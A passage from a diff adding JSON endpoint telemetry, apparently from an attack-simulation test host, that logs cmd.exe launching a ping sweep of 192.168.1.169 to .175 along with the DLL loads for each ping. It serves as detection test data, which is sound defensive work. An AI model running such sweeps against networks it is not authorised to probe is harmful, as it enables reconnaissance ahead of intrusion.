"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572806980000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572806980000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572806980000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572806980000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" + }, + { + "event_type": "process", + "pid": 7448, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572811990000, + "unique_pid": "{42FC7E13-CBA0-5C05-0000-0010252F5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.169", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6752, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572812150000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572812140000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572812140000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572812140000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572812140000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572812140000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572812140000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572812140000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572812140000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572812140000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572812140000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572812140000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" + }, + { + "event_type": "process", + "pid": 6752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572816830000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.170", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2792, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572816980000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572816980000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572816980000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572816980000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572816980000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572816980000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572816980000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572816980000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572816980000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572816980000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572816980000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572816980000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" + }, + { + "event_type": "process", + "pid": 2792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572821830000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.171", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5116, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572821980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5116, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572821980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5116, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572821980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5116, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572821980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5116, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572821980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5116, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572821980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5116, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572821980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5116, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572821980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5116, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572821980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5116, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572821980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5116, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572821980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5116, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572821980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" + }, + { + "event_type": "process", + "pid": 5116, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572826830000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.172", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3896, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572826980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3896, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572826980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3896, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572826980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3896, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572826980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3896, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572826980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3896, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572826980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3896, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572826980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3896, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572826980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3896, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572826980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3896, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572826980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3896, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572826980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3896, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572826980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" + }, + { + "event_type": "process", + "pid": 3896, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572831990000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.173", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7468, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572832140000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7468, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572832140000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7468, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572832140000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7468, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572832140000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7468, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572832140000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7468, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572832140000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7468, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572832140000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7468, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572832140000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7468, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572832140000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7468, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572832140000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7468, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572832140000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7468, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572832140000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" + }, + { + "event_type": "process", + "pid": 7468, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572836830000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.174", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2960, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572836970000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572836980000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572836980000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572836980000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572836980000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572836980000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572836980000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572836980000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572836980000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572836980000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572836980000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572836980000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" + }, + { + "event_type": "process", + "pid": 2960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572841990000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.175", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5244, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572842140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572842140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572842140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572842140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572842140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572842140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" + 